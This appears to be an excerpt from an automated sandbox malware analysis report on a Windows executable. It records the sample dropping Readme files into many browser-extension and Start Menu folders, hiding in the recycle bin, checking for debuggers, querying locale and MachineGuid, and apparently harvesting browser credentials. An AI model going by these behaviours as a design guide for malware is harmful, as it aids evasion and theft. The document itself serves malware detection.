                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ar\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\bg\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ca\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\cs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\da\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\de\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\el\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_GB\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_US\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\et\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\eu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fil\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\he\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\id\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\it\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ja\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ko\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lt\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ms\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\nl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\no\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_BR\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_PT\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ro\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ru\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\th\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\tr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\uk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\vi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_CN\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_TW\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_metadata\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Readme.READMEJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Creates files in the recycle bin to hide itselfShow sources
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\$Recycle.Bin\S-1-5-18\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F1C5F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_013F1C5F
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013C9500 wsprintfW,FindFirstFileW,wsprintfW,_wcsstr,_wcsstr,FindNextFileW,FindClose,_wcsstr,0_2_013C9500
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_0140C916 FindFirstFileExA,0_2_0140C916
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013C8F21 __EH_prolog3_GS,GetLogicalDriveStringsW,GetDriveTypeW,0_2_013C8F21
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F34AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013F34AB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_014034C6 mov eax, dword ptr fs:[00000030h]0_2_014034C6
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013CA164 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,CreateThread,WaitForMultipleObjects,CloseHandle,GetProcessHeap,HeapFree,ExitProcess,0_2_013CA164
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F360A SetUnhandledExceptionFilter,0_2_013F360A
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F34AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013F34AB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F36BB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_013F36BB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013FD897 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013FD897
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F2F43 cpuid 0_2_013F2F43
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: EnumSystemLocalesW,0_2_01406B96
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,0_2_01406FCE
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0140F4B3
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: EnumSystemLocalesW,0_2_0140F776
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: EnumSystemLocalesW,0_2_0140F72B
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,0_2_0140F682
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: EnumSystemLocalesW,0_2_0140F811
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0140F89E
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,0_2_0140FAEE
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,0_2_0140FD1E
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0140FDEB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0140FC17
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_01407038 GetSystemTimeAsFileTime,0_2_01407038
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
